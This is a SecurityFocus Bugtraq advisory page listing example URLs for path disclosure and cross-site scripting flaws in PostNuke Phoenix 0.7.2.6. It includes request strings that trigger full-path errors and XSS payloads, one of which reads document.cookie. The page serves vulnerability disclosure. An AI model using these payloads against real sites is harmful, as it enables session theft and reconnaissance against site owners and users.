Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

PostNuke Phoenix Multiple Cross-Site Scripting And Path Disclosure Vulnerabilities

The following examples have been supplied:

Path disclosure:
http://www.example.com/postnuke0726/includes/blocks/finclude.php
http://www.example.com/postnuke0726/pnadodb/drivers/adodb-access.inc.php
http://www.example.com/postnuke0726/modules/NS-NewUser/user.php
http://www.example.com/postnuke0726/modules/NS-Your_Account/user/links/links.changehome.php
http://www.example.com/postnuke0726/modules/NS-Your_Account/user/case/case.changehome.php?op=edithome
http://www.example.com/postnuke0726/modules/NS-LostPassword/user.php
http://www.example.com/postnuke0726/modules/NS-Multisites/chgtheme.inc.php
http://www.example.com/postnuke0726/modules/NS-Multisites/head.inc.php
http://www.example.com/postnuke0726/modules/NS-Multisites/print.inc.php
http://www.example.com/postnuke0726/modules/NS-User/tools.php
http://www.example.com/postnuke0726/modules/NS-User/user.php


Cross-Site Scripting:
http://www.example.com/postnuke0726/modules.php?op=modload&name=Downloads&file=index&req=ratedownload&ttitle=x&lid=>[xss code here]
http://www.example.com/postnuke0726/modules.php?op=modload&name=Downloads&file=index&req=search&query=>[xss code here]
http://www.example.com/postnuke0726/modules.php?op=modload&name=Web_Links&file=index&req=search&query=>[xss code here]
http://www.example.com/postnuke0726/javascript/openwindow.php?hlpfile=x<html><body>[xss code here]
http://www.example.com/postnuke0726/javascript/openwindow.php?hlpfile=x<html><body%20onload=alert(document.cookie);>







 

Privacy Statement
Copyright 2009, SecurityFocus